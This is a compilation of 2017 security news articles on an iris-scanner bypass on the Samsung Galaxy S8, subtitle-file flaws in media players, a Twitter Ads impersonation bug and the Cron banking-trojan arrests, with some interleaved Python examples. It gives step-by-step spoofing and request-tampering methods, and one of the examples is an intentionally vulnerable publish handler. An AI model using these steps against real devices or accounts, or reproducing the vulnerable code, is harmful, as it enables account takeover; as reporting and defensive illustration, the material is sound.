Experts say there are several ways to obtain iris data, including from high-resolution pictures posted by users themselves on the Internet. Another method is to take a picture of the targeted individual’s eye using a digital camera with night-shot mode or the infrared filter disabled.

Researchers demonstrated that a camera with a 200mm lens can capture a usable picture of the iris from up to five meters (16 feet).

“In the infrared light spectrum – usually filtered in cameras – the fine, normally hard to distinguish details of the iris of dark eyes are well recognizable,” the CCC said. “Depending on the picture quality, brightness and contrast might need to be adjusted.”

Once the picture of the iris has been obtained, it can be printed out using a laser printer – the best results were, ironically, obtained on a Samsung printer. The last step is to place a contact lens on top of the print to mimic the curvature of a real eye. Placing the photo in front of the Galaxy S8’s iris scanner successfully unlocks the device.

SecurityWeek has reached out to Samsung for comment and will update this article if the company responds.

This is not the first time someone has targeted the biometrics features of the Samsung Galaxy S8. It was demonstrated a few weeks ago that the smartphone’s face recognition system can be bypassed simply by showing it a picture of the targeted user’s face.

The CCC said that if rumors turn out to be true and the next iPhone generation will have an iris scanner, they will try to defeat that one as well.

Biometrics are increasingly popular, especially in the financial industry. Banks are now allowing customers to use selfies, their voice and their fingerprints for authentication and authorization.

While biometric authentication is often advertised as highly secure, there are ways to defeat it. A BBC reporter demonstrated recently that his non-identical twin brother could access his HSBC account by fooling the bank’s voice ID authentication service.


Flashpoint Enhances Risk Intelligence Platform

24.5.2017 securityweek Security
Just as global intelligence firm Stratfor extracts and presents geopolitical intelligence from the noise of available information, so now does Flashpoint extract cyber business risk intelligence (BRI) from the noise of deep and dark web conversations.

Flashpoint is not new to BRI. It raised $10 million in Series B funding in July 2016 and announced its expansion from cyber threat intelligence into business risk intelligence. "Looking beyond cyber threat Intelligence, BRI ultimately informs decision-making, improves preparation, and mitigates risk throughout an entire organization," said Flashpoint at the time.

That process has now come to fruition with today's launch of the Flashpoint Intelligence Platform 3.0. It aims to convert and present the raw intelligence gleaned from the deep and dark web as actionable business risk intelligence that will help customers take a more strategic role in security planning.

Most threat intelligence ultimately comes from the deep and dark web. This is where cyber criminals share information, trade malware and boast about exploits. But access is difficult. The deepest and darkest areas are well-protected, and only accessible to 'approved' people. Flashpoint has a team of expert analysts, often with 3-letter agency backgrounds, who spend the time and effort necessary to get into the darkest corners.

This is where Flashpoint gleans its threat intelligence. It comes from actual dialogue between threat actors; from black market products and services; from where malicious tactics, techniques and procedures (TTPs) are discussed; and where weapons and training manuals are shared.

But threat intelligence falls short of business risk intelligence. "Some threat intelligence solutions can be no different than URL filtering, merely contributing to the greater noise," warns Gartner Research VP, Greg Young. "Instead, good threat intelligence solutions are customized and able to deliver a high-confidence alert to initiate an actionable response. Peering out at what often looks like a world of shadows and hostility, security teams can see specificity as a key to the achievement of their best success with limited resources."

For most organizations, access to any threat intelligence comes from surface web reports produced by different security vendors. These often discuss individual threats discovered by individual vendors, often focusing on their own product sphere. While these are valuable, they present a piecemeal view of the overall threat landscape.

In this sense, Flashpoint is vendor-neutral: it provides intelligence rather than product. Its new development is to generate and present actual risk intelligence from the raw threat intelligence. Its team of analysts does not just gather intelligence from the dark web; it converts it, through analysis reports, into business-actionable information -- in short, it adds context that goes beyond cyber.

"Traditional cyber threat intelligence, which has been largely focused on indicators of compromise, is insufficient in supporting the risk decision-making process, as it too often limits its focus on events in cyberspace," warned Flashpoint in its Business Risk Intelligence - Decision Report, published in January 2017. "Not all actors constrain their operations solely to the cyber realm; top tier nation-states like the U.S. and Russia use the full-spectrum of their capabilities to achieve their objectives. A threat assessment of Chinese or Russian cyber operations without the context of the national objectives they are supporting fails to provide risk decision-makers with an accurate portrayal of the threat landscape upon which to make business decisions."

The Intelligence Platform 3.0 provides access to Flashpoint's analyses with a finished intelligence experience. Users can use it to search Flashpoint's reports, focusing on specific areas of interest and including both cybercrime intelligence and physical threat intelligence -- or they can pivot directly into a sanitized sandbox of the original threat actor data. The result helps the security team understand the overall threat landscape, and provides the materials necessary to translate threats into business risks consumable by senior management.


CEOs and Coffee Shops Are Mobile Computing's Biggest Risks: Report

24.5.2017 securityweek Mobil
The balance between encouraging mobility for business purposes and controlling it for security remains as tricky today as ever. Ninety-three percent of organizations are now somewhat or very concerned that the mobile workforce is presenting an increasing number of security challenges. Of these, 47% are 'very concerned'; a figure that has grown from 36% a year ago.

These figures come from the iPass 2017 Mobile Security Report (PDF), published today. iPass is a global provider of always-on, secure Wi-Fi; with more than 60 million hotspots in more than 120 countries.

Vanson Bourne surveyed 500 CIOs and senior IT decision makers from the US (200), UK (100), Germany (100) and France (100). While the results are broadly consistent across all regions, there are nevertheless some surprising differences. For example, while there is acknowledgement that security is needed, there is apparent recognition that control is difficult -- and the extent of the problem and ways to solve it differ by geographic region.

Less than a third of companies ban the use of public Wi-Fi at all times, while a further 37% ban their use 'sometimes'. More surprising, however, is the regional difference: 44% of UK organizations do not, and do not plan to introduce a ban; but only 10% of US companies are similar. Eight percent of UK companies have no concern over mobile security, while only 1% of US companies have no concerns.

Coffee shops are unsurprisingly a major cause of concern. "Wherever there is an unsecured public Wi-Fi network," notes the report, "there is the threat of attack. However, coffee shops are seen as the most dangerous public Wi-Fi venue of all." Across all regions surveyed, 42% of respondents cited coffee shops as their major concern over public Wi-Fi. "Cafes and coffee shops are everywhere and offer both convenience and comfort for mobile workers, who flock to these venues for the free high speed internet as much as for the coffee," comments Raghu Konka, vice president of engineering at iPass. "However, cafes invariably have lax security standards, meaning that anyone using these networks will be potentially vulnerable."

Cafes are followed by airports (30%) and hotels (16%) as the locations giving most concern over public Wi-Fi.

Man-in-the-middle (MitM) attacks are considered the greatest threat, cited by 69% of respondents. This is followed by lack of encryption (63%), hotspot spoofing (58%), and unpatched devices (55%).

The greatest risk, however, comes not from mid-level or even junior staff -- it is the CEO and other C-level executives. "The grim reality," explains Konka, "is that C-level executives are by far at the greatest risk of being hacked outside of the office. They are not your typical 9-5 office worker. They often work long hours, are rarely confined to the office, and have unrestricted access to the most sensitive company data imaginable. They represent a dangerous combination of being both highly valuable and highly available, therefore a prime target for any hacker."

The respondents agreed. Overall, 40% of respondents named the C-Suite. It was as low as 29% in the UK (possibly because there are fewer C-level executives), and as high as 49% in Germany. It was 40% in the US. Senior management came in as presenting the second most serious threat, at 34% overall. Not surprisingly, it was higher in the UK at 42%; and lower in the US at 26%.

The simple reality is that mobile working is an essential part of modern business despite security concerns about it. In many cases, the survey suggests that total bans on public Wi-Fi are increasingly adopted. "Sadly, in response to this growing threat, the majority of organizations are choosing to ban first and think later," comments Konka. "They ignore the fact that, in an increasingly mobile world, there are actually far more opportunities than threats. Rather than give in to security threats and enforce bans that can be detrimental or even unenforceable, businesses must instead ensure that their mobile workers have the tools to get online and work securely at all times."


Media Players Expose Millions of Systems to Subtitle Attacks

24.5.2017 securityweek Hacking
Malicious actors could hijack millions of systems using specially crafted subtitle files that exploit vulnerabilities in some of the most popular media players, security firm Check Point warned on Tuesday.

According to experts, attackers can take complete control of a device simply by getting the targeted user to open a malicious subtitle file in one of the vulnerable media players. In the case of applications that automatically obtain subtitles from the Internet, it may be possible to conduct attacks without any user interaction.

Check Point’s analysis has focused on four popular media players, but researchers believe other applications are likely affected as well. The players confirmed to be vulnerable are VLC, the open-source home theater software Kodi (formerly known as XBMC), the video streaming app Stremio, and Popcorn Time, which streams movies and TV shows directly from torrents.

Experts pointed out that the potential number of victims for these subtitle attacks is very high considering that the latest version of VLC has been downloaded 170 million times, and Kodi reportedly has nearly 40 million unique users each month.

The developers of these media players have released patches, but some issues are still under investigation and Check Point has decided not to make public any technical details.

According to the security firm, hackers can use specially crafted subtitle files to execute arbitrary code, which can allow them to take complete control of the system.

“The attacker can do whatever he wants with the victim’s machine, whether it is a PC, a smart TV, or a mobile device,” Check Point’s research team said in a blog post. “The potential damage the attacker can inflict is endless, ranging anywhere from stealing sensitive information, installing ransomware, mass Denial of Service attacks, and much more.”

A video published by Check Point shows how the attack works.

While in some cases the targeted user needs to be convinced to open the malicious file with an affected player, researchers warned that attackers could also manipulate the ranking algorithm of subtitle websites to ensure that applications designed to automatically load subtitles would pick their file. By ensuring that their subtitle has a high ranking, attackers also increase the chances of users manually loading the malicious files.


New Product Allows Easy Addition of Multi-Factor Authentication to Any Application

24.5.2017 securityweek Safety
New Multi-factor Authentication Offering Seeks Balance Between Strong Security and Ease of Use

The correct balance between strong security and excessive control is difficult. Without strong security, such as multi-factor authentication (MFA), organizations will be breached. With excessive control (such as MFA always and everywhere), business will be impeded, employees will be disgruntled, and controls will be bypassed. A new behavioral authentication product announced today by security firm Preempt allows optional MFA, based on user behavior, on any application.

Preempt's new "Any App" offering seeks to solve the growing concern over the insider threat by allowing policy to dictate whether user access to any application should be challenged by multi-factor authentication requirements, or simply allowed. This increases security without increasing unnecessary impediment to business.

The insider threat is insidious. It can come from innocent users, 'malicious' users motivated by curiosity or worse, or hackers inside the network with stolen credentials. While modern network analytics can detect 'unusual' behavior, they cannot automatically distinguish between simple unusual and malicious unusual. The result is a large number of alerts that need to be investigated but are often false positives.

Preempt's Any App takes a different approach by imposing strong security in the form of multi-factor authentication requirements on any specified application whenever -- but only if -- 'unusual' user behavior is detected. This is an advance on the more usual and common approach of applying MFA to web applications only.

"Security teams want to better protect their organization and application from threats and breaches by adding policies that require users to validate their identity via authentication techniques before accessing corporate applications," explains Ajit Sancheti, co-founder and CEO of Preempt. But while adding MFA to web applications is relatively simple, protecting on-premises applications is more complex. Integrating secure authentication into each application requires significant resources, which typically leads to the majority of internal applications not being protected by MFA.

Any App, he continues, "removes the need for application customization, and turns the task of adding MFA support to applications into a simple matter of defining policy, which saves both time and money, while also protecting the organization from security breaches."

Any App works at the network layer for both Windows and Linux environments, and acts as an LDAP or Kerberos proxy. When a user first seeks access to an application, the application will attempt to verify the user. Any App proxies this request, and based on security policy can either allow access or require MFA.

If policy requires additional authentication, the organization's MFA solution is automatically triggered. Since Any App is vendor neutral, the MFA can come from the existing deployment of a range of vendors such as Duo, OKTA, and SecureAuth.

The behavioral policy engine within Any App allows the security team to define the conditions necessary to invoke MFA. For example, if the access request comes from an unmanaged device, or if the user is connecting to a new asset or from a new location or new device. This allows the security team to automatically apply more stringent controls without requiring individual alert analysis.
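The decision the preceding paragraphs describe, a proxy deciding per request whether to let the application authenticate the user as usual or to step up to MFA, reduces to a small policy over request context plus a per-user baseline. The sketch below is an added example, not Preempt's code: the request fields, the baseline model and the sample requests are constructed for illustration. One design choice worth noting is that anything not yet in the baseline (including a user's very first access) is challenged, and the baseline only grows after the challenge has been passed, so an attacker with stolen credentials cannot "teach" the system a new device or location by simply trying.

```python
"""Risk-based step-up authentication policy (illustrative example).

Models the decision an authentication proxy makes per access request: allow,
or require MFA, based on policy over the request's context. Not the vendor's
code; fields, baseline model and sample data are constructed for this example.
"""
from dataclasses import dataclass, field
from enum import Enum


class Decision(Enum):
    ALLOW = "allow"
    REQUIRE_MFA = "require_mfa"


@dataclass(frozen=True)
class AccessRequest:
    user: str
    asset: str          # application or host being accessed
    device_id: str
    location: str       # network or geographic label as seen by the proxy
    device_managed: bool


@dataclass
class UserBaseline:
    """Contexts already confirmed for a user (filled after successful auth)."""
    assets: set = field(default_factory=set)
    devices: set = field(default_factory=set)
    locations: set = field(default_factory=set)


class StepUpPolicy:
    """Anything not in the user's baseline counts as 'new' and triggers MFA, so a
    user's first access is challenged too; the baseline is only extended by
    record_success(), i.e. after the request was allowed or MFA passed."""

    def __init__(self) -> None:
        self.baselines: dict[str, UserBaseline] = {}

    def evaluate(self, req: AccessRequest) -> tuple[Decision, list[str]]:
        base = self.baselines.setdefault(req.user, UserBaseline())
        reasons: list[str] = []
        if not req.device_managed:
            reasons.append("unmanaged device")
        if req.asset not in base.assets:
            reasons.append("new asset")
        if req.device_id not in base.devices:
            reasons.append("new device")
        if req.location not in base.locations:
            reasons.append("new location")
        decision = Decision.REQUIRE_MFA if reasons else Decision.ALLOW
        return decision, reasons

    def record_success(self, req: AccessRequest) -> None:
        """Extend the baseline after a successful authentication.
        Unmanaged devices are deliberately never learned as trusted."""
        base = self.baselines.setdefault(req.user, UserBaseline())
        base.assets.add(req.asset)
        base.locations.add(req.location)
        if req.device_managed:
            base.devices.add(req.device_id)


def demo() -> list[tuple[str, list[str]]]:
    """Walk a constructed sequence of requests through the policy."""
    policy = StepUpPolicy()
    first = AccessRequest("alice", "payroll-app", "lt-0001", "hq-lan", True)
    results = []

    d, why = policy.evaluate(first)         # nothing known yet -> MFA
    results.append((d.value, why))
    policy.record_success(first)            # MFA passed, learn the context

    d, why = policy.evaluate(first)         # same context -> allowed silently
    results.append((d.value, why))

    roaming = AccessRequest("alice", "payroll-app", "lt-0001", "hotel-wifi", True)
    d, why = policy.evaluate(roaming)       # only the location is new
    results.append((d.value, why))

    byod = AccessRequest("alice", "payroll-app", "phone-9", "hq-lan", False)
    d, why = policy.evaluate(byod)          # unmanaged and never-seen device
    results.append((d.value, why))
    return results


if __name__ == "__main__":
    for decision, reasons in demo():
        print(decision, reasons)
```

The reasons list is returned alongside the decision so that every step-up can be logged with its cause, which is what lets the security team tune the policy instead of investigating individual alerts.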

Any App attempts to allow the security team to define and control the balance between strong security and ease of use. It reduces the cost of strong security while activating it only where policy decides it is necessary.


Twitter Bug Allowed Publishing Tweets From Any Account

24.5.2017 securityweek Social
A bug in the Twitter social network allowed an attacker to post tweets as a different user, without having access to the victim’s account.

Discovered by a security researcher going by the name of kedrisec, the issue was reported to Twitter on February 26 and was resolved two days later. The vulnerability was assessed High severity and the reporter received a $7,560 bounty for it.

The issue resided in the handling of Twitter Ads Studio requests, Twitter explains: “By sharing media with a victim user and then modifying the post request with the victim's account ID the media in question would be posted from the victim's account.”

No evidence of the flaw being exploited in the wild has been found so far, with the reporter being the only one to have leveraged the vulnerability, Twitter says.

In their write-up, the researcher explains that the issue leverages Twitter’s ads service, which “has media-library with the possibility to upload media-files (video, pictures, GIF-animation).” The service also offers the option to review media-files uploaded before and which were used when a tweet was published.

The library is located at https://ads.twitter.com/accounts/*id_of_user_account*/media and allows the user not only to view the media file, but also to tweet the file or share it with other users. The function for tweeting has access to account_id, owner_id (image owner), user_id (the user the tweet will be published to), and media_key (id of the media-file that is being published).

Attempting to replace the owner_id and user_id in intercepted GET request and JSON or in POST returned errors. The POST error, however, revealed that the service doesn’t accept the user with the replaced owner_id as the owner of the media file.

The researcher then attempted to modify not only owner_id and user_id, but media_key in POST as well, which resulted in a successful attempt of tweet publication. While this allowed the researcher to publish as any user, it did show a limitation: they could publish only if the user had media-files uploaded and also had to know the media_key of the file, which is almost impossible to get, as it contains 18 digits.

However, if the attacker shared a media-file with the targeted user (meaning the attacker already knows the media_key), the service would consider the victim being the owner of the file, thus allowing the attacker to successfully impersonate the victim when tweeting.

In short, the attack consisted of the following steps: uploading a file, sharing the file with the targeted user, intercepting the tweet publication request and changing the owner_id and user_id in the POST body (the media_key, already known to the attacker, stays unchanged).
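The root cause described above is a familiar one: the acting identity was taken from fields in the request body rather than from the authenticated session, and a user the media had merely been shared with satisfied the ownership check. The Python sketch below is an added example, not Twitter's code; the in-memory store, field names and sample users are constructed. It places a handler that trusts owner_id/user_id from the POST beside a hardened one that derives the author from the session, treats shared access as access only (never ownership), and rejects rather than silently ignores a user_id that disagrees with the session, since such a mismatch is tampering worth alerting on.

```python
"""Authorization for a 'post this media' endpoint: vulnerable vs. hardened.

Illustrative example of the flaw class in the report (identity taken from
request parameters instead of the session). Not Twitter's code; the store,
field names and sample users are constructed for this example.
"""
from dataclasses import dataclass, field


class AuthzError(Exception):
    """Raised when the authenticated user may not perform the action."""


@dataclass
class Media:
    media_key: str
    owner_id: str
    shared_with: set = field(default_factory=set)


@dataclass
class Post:
    author_id: str
    media_key: str


class MediaService:
    def __init__(self) -> None:
        self.media: dict[str, Media] = {}
        self.posts: list[Post] = []

    def upload(self, session_user: str, media_key: str) -> Media:
        m = Media(media_key=media_key, owner_id=session_user)
        self.media[media_key] = m
        return m

    def share(self, session_user: str, media_key: str, target_user: str) -> None:
        m = self.media[media_key]
        if m.owner_id != session_user:
            raise AuthzError("only the owner can share media")
        m.shared_with.add(target_user)

    def _can_access(self, user: str, m: Media) -> bool:
        return user == m.owner_id or user in m.shared_with

    # --- vulnerable handler: trusts identities supplied in the request body ---
    def publish_vulnerable(self, session_user: str, body: dict) -> Post:
        m = self.media[body["media_key"]]
        # The only check is that the *claimed* owner can access the media.
        # A user the media was shared with passes that check, so whoever shared
        # the file with them can name them as owner_id/user_id.
        if not self._can_access(body["owner_id"], m):
            raise AuthzError("claimed owner has no access to this media")
        post = Post(author_id=body["user_id"], media_key=m.media_key)
        self.posts.append(post)
        return post

    # --- hardened handler: identity comes from the session only ---
    def publish_hardened(self, session_user: str, body: dict) -> Post:
        m = self.media[body["media_key"]]
        # A user_id that disagrees with the session is tampering: reject and log
        # it rather than silently substituting the session user.
        if body.get("user_id", session_user) != session_user:
            raise AuthzError("user_id does not match the authenticated session")
        # The session user must own the media or have been granted access to it;
        # being granted access never makes them the owner.
        if not self._can_access(session_user, m):
            raise AuthzError("authenticated user has no access to this media")
        post = Post(author_id=session_user, media_key=m.media_key)
        self.posts.append(post)
        return post


KEY = "media-000000000000000001"   # constructed media key


def impersonation_attempt(handler_name: str) -> str:
    """Run the reported flow against one handler and report the outcome."""
    svc = MediaService()
    svc.upload("attacker", KEY)
    svc.share("attacker", KEY, "victim")
    tampered = {"media_key": KEY, "owner_id": "victim", "user_id": "victim"}
    try:
        post = getattr(svc, handler_name)("attacker", tampered)
        return f"posted as {post.author_id}"
    except AuthzError as e:
        return f"rejected: {e}"


def legitimate_use() -> str:
    """The victim posting media that was shared with them, as themselves."""
    svc = MediaService()
    svc.upload("alice", KEY)
    svc.share("alice", KEY, "bob")
    post = svc.publish_hardened("bob", {"media_key": KEY})
    return post.author_id
```

The hardened handler still lets a recipient of shared media post it, which is the feature the endpoint exists for; it only refuses to let anyone but the session user be recorded as the author.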


Beware! Subtitle Files Can Hack Your Computer While You're Enjoying Movies
24.5.2017 thehackernews Hacking
Do you watch movies with subtitles?
Just last night, I wanted to watch a French movie, so I searched for English subtitles and downloaded it to my computer.
Though that film was excellent, this morning new research from Check Point scared me.
I was unaware that a little subtitle file could hand over full control of my computer to hackers, while I was enjoying the movie.
Yes, you heard that right.
A team of researchers at Check Point has discovered vulnerabilities in four of the most popular media player applications, which can be exploited by hackers to hijack "any type of device via vulnerabilities; whether it is a PC, a smart TV, or a mobile device" with malicious code inserted into the subtitle files.
"We have now discovered malicious subtitles could be created and delivered to millions of devices automatically, bypassing security software and giving the attacker full control of the infected device and the data it holds," he added.
These four vulnerable media players (mentioned below) have been downloaded more than 220 million times:
VLC — Popular VideoLAN Media Player
Kodi (XBMC) — Open-Source Media Software
Popcorn Time — Software to watch Movies and TV shows instantly
Stremio — Video Streaming App for Videos, Movies, TV series and TV channels
The vulnerabilities reside in the way various media players process subtitle files and if exploited successfully, could put hundreds of millions of users at risk of getting hacked.
As soon as the media player parses those malicious subtitle files before displaying the actual subtitles on your screen, the hackers are granted full control of your computer or Smart TV on which you ran those files.
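Neither report gives technical detail on the bugs, and the example below does not guess at them. As an added illustration of the posture the findings call for, treating a downloaded subtitle file as untrusted input, here is a strict SubRip (.srt) parser in Python; it is not code from any of the players named, and the limits and sample inputs are constructed. It matches timecodes against an exact format, caps file size, cue count and line length, refuses control characters, and discards the whole file on the first malformed cue rather than attempting best-effort recovery, which is where lenient parsers tend to get into trouble.

```python
"""Strict SubRip (.srt) parser that treats subtitle files as untrusted input.

Illustrative example, not code from any media player named in the article.
Limits and sample inputs are constructed for this example.
"""
import re
from dataclasses import dataclass

MAX_FILE_BYTES = 2_000_000     # far above any real subtitle file
MAX_CUES = 10_000
MAX_LINES_PER_CUE = 8
MAX_LINE_CHARS = 512

# Exactly "HH:MM:SS,mmm --> HH:MM:SS,mmm", ASCII digits only.
TIMECODE = re.compile(
    r"^([0-9]{2}):([0-9]{2}):([0-9]{2}),([0-9]{3}) --> "
    r"([0-9]{2}):([0-9]{2}):([0-9]{2}),([0-9]{3})$"
)
INDEX = re.compile(r"^[0-9]{1,6}$")


class SubtitleError(ValueError):
    """Any deviation from the expected format; the file is discarded."""


@dataclass
class Cue:
    index: int
    start_ms: int
    end_ms: int
    lines: list


def _to_ms(h: str, m: str, s: str, ms: str) -> int:
    hh, mm, ss, mss = int(h), int(m), int(s), int(ms)
    if mm > 59 or ss > 59:
        raise SubtitleError("timecode field out of range")
    return ((hh * 60 + mm) * 60 + ss) * 1000 + mss


def parse_srt(text: str) -> list:
    if len(text.encode("utf-8")) > MAX_FILE_BYTES:
        raise SubtitleError("file too large")
    text = text.lstrip("\ufeff").replace("\r\n", "\n").replace("\r", "\n").strip("\n")
    if not text:
        raise SubtitleError("empty file")
    cues = []
    last_start = -1
    for block in re.split(r"\n{2,}", text):
        if len(cues) >= MAX_CUES:
            raise SubtitleError("too many cues")
        lines = block.split("\n")
        if len(lines) < 2:
            raise SubtitleError("cue block truncated")
        if not INDEX.match(lines[0]):
            raise SubtitleError("bad cue index")
        index = int(lines[0])
        if index != len(cues) + 1:
            raise SubtitleError("cue index out of sequence")
        m = TIMECODE.match(lines[1])
        if not m:
            raise SubtitleError("bad timecode line")
        start = _to_ms(*m.groups()[:4])
        end = _to_ms(*m.groups()[4:])
        if end <= start or start < last_start:
            raise SubtitleError("timecodes not ordered")
        body = lines[2:]
        if len(body) > MAX_LINES_PER_CUE:
            raise SubtitleError("too many text lines in cue")
        for line in body:
            if len(line) > MAX_LINE_CHARS:
                raise SubtitleError("text line too long")
            if any(ord(c) < 0x20 for c in line):   # no control characters in text
                raise SubtitleError("control character in text")
        cues.append(Cue(index, start, end, body))
        last_start = start
    return cues


def is_valid_srt(text: str) -> bool:
    try:
        parse_srt(text)
        return True
    except SubtitleError:
        return False


# Constructed samples: one well-formed file and three that must be rejected.
GOOD = ("1\n00:00:01,000 --> 00:00:02,500\nHello\n\n"
        "2\n00:00:03,000 --> 00:00:04,000\nWorld\nagain\n")
BAD_SECONDS = "1\n00:00:99,000 --> 00:01:40,000\nx\n"
BAD_ORDER = "1\n00:00:05,000 --> 00:00:04,000\nx\n"
BAD_LONG = "1\n00:00:01,000 --> 00:00:02,000\n" + "A" * 600 + "\n"
```

A player that adopted rules like these would give up displaying a handful of sloppily edited community files in exchange for never handing its renderer a cue it did not fully validate.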
Proof-of-Concept Video

In the above video, the researchers demonstrated how a maliciously crafted subtitle file for a movie, added to the Popcorn Time media player, can hijack a Windows PC. On the right-hand side of the screen, an attacker running Kali Linux gained remote access to the system as soon as the victim added the subtitle file.
Since text-based subtitles for movies and TV shows are created by writers and then uploaded to Internet stores, like OpenSubtitles and SubDB, hackers could also craft malicious text files for same TV shows and movies.
"Our researchers were also able to show that by manipulating the website’s ranking algorithm, we could guarantee crafted malicious subtitles would be those automatically downloaded by the media player, allowing a hacker to take complete control over the entire subtitle supply chain, without resorting to a Man in the Middle attack or requiring user interaction," Check Point researchers said.

The researchers believe that similar security vulnerabilities also exist in other streaming media players.
How to Protect Your Computer from Hackers?
Check Point has already informed the developers of VLC, Kodi, Popcorn Time and Stremio applications about the recently discovered vulnerabilities.
"To allow the developers more time to address the vulnerabilities, we’ve decided not to publish any further technical details at this point," the researchers said.
All of them have patched the flaws, with Stremio and VLC releasing patched versions of their software: Stremio 4.0 and VLC 2.2.5, which has been out for two weeks.
However, Kodi developer Martijn Kaijser said the official version 17.2 release would arrive later this week, while users could get a fixed version online. A patch for Popcorn Time is also available online.
So, users are advised to update their media player as soon as possible.


Cyber Crime Gang Arrested for Infecting Over 1 Million Phones with Banking Trojan
24.5.2017 thehackernews Virus
The Russian Interior Ministry announced on Monday the arrest of 20 individuals from a major cybercriminal gang that had stolen nearly $900,000 from bank accounts after infecting over one million Android smartphones with a mobile Trojan called "CronBot."
Russian Interior Ministry representative Rina Wolf said the arrests were part of a joint effort with Russian IT security firm Group-IB that assisted the massive investigation.
The collaboration resulted in the arrest of 16 members of the Cron group in November 2016, while the last active members were apprehended in April 2017, all living in the Russian regions of Ivanovo, Moscow, Rostov, Chelyabinsk, and Yaroslavl and the Republic of Mari El.
Targeted Over 1 Million Phones — How They Did It?

Group-IB first learned of the Cron malware gang in March 2015, when the criminal gang was distributing the Cron Bot malware disguised as Viber and Google Play apps.
The Cron malware gang abused the popularity of SMS-banking services and distributed the malware onto victims' Android devices by setting up apps designed to mimic banks' official apps.
The gang even inserted the malware into fake mobile apps for popular pornography websites, such as PornHub.
Once victims downloaded and installed these fake apps on their devices, the apps added themselves to auto-start, and the malware hidden inside them gave the hackers the ability to phish victims’ banking credentials and intercept SMS messages containing confirmation codes sent by the bank to verify transactions.
"After installation, the program added itself to the auto-start and could send SMS messages to the phone numbers indicated by the criminals, upload SMS messages received by the victim to C&C servers, and hide SMS messages coming from the bank," writes Group-IB.
"The approach was rather simple: after a victim’s phone got infected, the Trojan could automatically transfer money from the user’s bank account to accounts controlled by the intruders. To successfully withdraw stolen money, the hackers opened more than 6 thousand bank accounts."
The gang usually sent text messages to the banks initiating a transfer of up to $120 to one of the roughly 6,000 bank accounts the group had set up to receive the fraudulent payments.
The malware would then intercept the two-step verification codes sent by the bank to confirm the transaction and block the victims from receiving a message notifying them about the transaction.
Cyberthieves Stole $900,000 in the Russia Alone

On April 1, 2016, the gang advertised its Android banking Trojan, dubbed "Cron Bot," on a Russian-speaking forum, giving the Group-IB researchers and Russian authorities a clue to their investigation into the group's operation.
According to the security firm, the group stole approximately 8,000 Rubles (nearly $100) from a victim on average, for a total of 50 Million Rubles (almost $900,000) from more than one million victims, with 3,500 unique Android devices infected per day.
After targeting customers of banks in Russia, where they lived, the Cron gang planned to expand its operation by targeting customers of banks in various countries, including the US, the UK, Germany, France, Turkey, Singapore, and Australia.
In June 2016, the gang rented a piece of malware called "Tiny.z" for $2,000 per month, designed to attack customers of Russian banks as well as international banks in Britain, Germany, France, the United States and Turkey, among other countries.
Despite operating only in Russia before their arrest, the gang members had already developed web injections for several of French banks including Credit Agricole, Assurance Banque, BNP Paribas, Banque Populaire, Boursorama, Caisse d'Epargne, Societe Generale and LCL, Group-IB said.
However, before the gang could launch attacks on French banks, the authorities managed to disrupt their operations by making several arrests, including the gang's founder, a 30-year-old resident of Ivanovo, Moscow.
During the raids, the authorities seized computer equipment, bank cards, and SIM cards associated with the criminal gang.


Police dismantled the Cron gang that targeted Bank Accounts via Android Malware
24.5.2017 securityaffairs  Android

Russian authorities with the support of the security firm Group-IB dismantled the operations of the Cron gang that infected more than 1 million smartphones.
Russian authorities dismantled a major criminal ring that was targeting bank accounts by using an Android malware, dubbed ‘Cron,’ that compromised more than one million Android smartphones.

According to the Russian Interior Ministry, the criminal organization had stolen nearly $900,000 from bank accounts.

Law enforcement, assisted by the cyber security firm Group-IB, identified 25 members of the organization, led by a 30-year-old living in the city of Ivanovo.

16 members of the gang were detained in November 2016, while the last active member was arrested in April.

The Cron Trojan was first spotted in March 2015, when the crime gang had been distributing the malware disguised as Viber and Google Play apps.

In early 2016, investigators discovered that an Android banking Trojan dubbed ‘Cron Bot’ was offered for rent in the criminal underground. According to experts from IBM X-Force, the Cron Bot had been leased for between $4,000 and $7,000, depending on the configuration chosen by the buyer.

Cron gang malware

The Cron gang used spam SMS messages to spread the malware to individuals in Russia, relying on a very effective social engineering technique. The SMS messages informed recipients that their ads or photos had been shared on a website, and included links to a site that tricked victims into downloading and executing the malicious code.

“Spam SMS messages with a link to a website infected with the banking Trojan. The message was of the following form: “Your ad is posted on the website ….”, or “your photos are posted here.” After the user visits the compromised website, the malware will be downloaded on the device, tricking the victim to install it.” reads the report published by Group-IB.

“The victim could install the malicious program on the phone by downloading fake applications masked as legitimate ones. The Trojan is distributed under the guise of such applications as Navitel; Framaroot; Pornhub; Avito.“

Once the Cron Trojan infected a device, the malware could send SMS messages to any phone number, upload SMS messages received by the victim to C&C servers, and hide SMS messages coming from the bank. Using these features, the malware could intercept the 2FA messages sent to users to authorize the fraudulent transactions conducted by the crooks.

The Cron gang earned approximately $900 000 USD (50 million rubles) with its activity.

“Every day Cron malware attempted to steal money from 50-60 clients of different banks. An average theft was about 8,000 rubles ($100). According to crime investigators, the total damage from Cron’s activity amounted to approximately $800 000 USD (50 million rubles). ” continues the report.

The investigators discovered that the Cron gang had decided to extend its activity to other countries and had rented the Tiny.z banking Trojan for $2,000 per month.

Experts speculate the hackers had been planning to target French banking users, because the Cron gang developed web injections for several French banks, including Credit Agricole, Assurance Banque, Banque Populaire, BNP Paribas, Boursorama, Caisse d’Epargne, Societe Generale and LCL.


Hackers demonstrated that it is too easy to bypass the Samsung S8 iris scanner
24.5.2017 securityaffairs  Hacking

Hackers demonstrated that it is very easy to bypass the Samsung S8 iris scanner by using a camera, a printer, and a contact lens.
Security experts have once again bypassed the biometric system of a mobile device, this time the Samsung S8.

Hackers used a camera, a printer and a contact lens to bypass the iris scanner installed on the Samsung S8.

Some smartphones use facial recognition technology for user authentication; researchers from the Chaos Computer Club (CCC) demonstrated that it is possible to easily bypass the scanner’s protections and unlock the device.

“We’ve had iris scanners that could be bypassed using a simple print-out,” Linus Neumann, one of the experts who devised the hacking technique, told Motherboard in a Twitter direct message.

“The Samsung Galaxy S8 is the first flagship smartphone with iris recognition. The manufacturer of the biometric solution is the company Princeton Identity Inc. The system promises secure individual user authentication by using the unique pattern of the human iris.” reads the post published by the Chaos Computer Club.

“A new test conducted by CCC hackers shows that this promise cannot be kept: With a simple to make dummy-eye the phone can be fooled into believing that it sees the eye of the legitimate owner.”

The researchers emulated a thief by capturing iris pictures with a digital camera in night-shot mode or with the infrared filter removed. Then, to give the image some depth, they placed a contact lens on top of the printed picture.

